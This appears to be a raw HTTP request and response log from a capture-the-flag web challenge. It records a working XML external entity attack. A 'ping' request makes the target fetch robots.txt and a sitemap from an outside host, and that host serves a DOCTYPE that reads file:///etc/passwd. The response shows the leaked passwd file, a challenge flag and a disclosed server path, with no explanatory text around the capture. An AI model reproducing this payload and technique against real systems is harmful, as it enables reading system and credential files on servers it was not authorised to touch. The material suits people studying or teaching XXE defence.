POST /handler.php HTTP/1.1
Host: 000990aa23-web-seo.dbhchallenge.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: https://000990aa23-web-seo.dbhchallenge.net
Referer: https://000990aa23-web-seo.dbhchallenge.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

action=ping&host=tadl.uber.space:47200




HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Mon, 08 Aug 2022 15:30:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1867
Connection: close
X-Powered-By: PHP/7.4.30
Vary: Accept-Encoding

<br />
<b>Warning</b>:  DOMDocument::schemaValidate(): Element 'userInfo': No matching global declaration available for the validation root. in <b>/var/www/html/handler.php</b> on line <b>62</b><br />
{"ping":"<h6>Host is reachable<\/h6><pre class='font-monospace'>...<\/pre>","sitemap":"<h6>sitemap.xml<\/h6><b>File loaded<\/b><p class='text-muted font-monospace'>\n John\n root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\ndbh:x:1000:1000:DBH{ServingYourCommand}:\/home\/dbh:\/bin\/sh\n\n...<\/p><br><b>Validation:<\/b><p class='font-monospace'>File is not validArray<\/p><br><b>URLs found:<\/b><ul class=list-group><\/ul>","robotstxt":"<h6>robots.txt<\/h6><pre class='font-monospace'><!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:\/\/\/etc\/passwd\"> ]>\n<userInfo>\n <firstName>John<\/firstName>\n <lastName>&ent;<\/lastName>\n<\/userInfo>\n<\/pre>"}
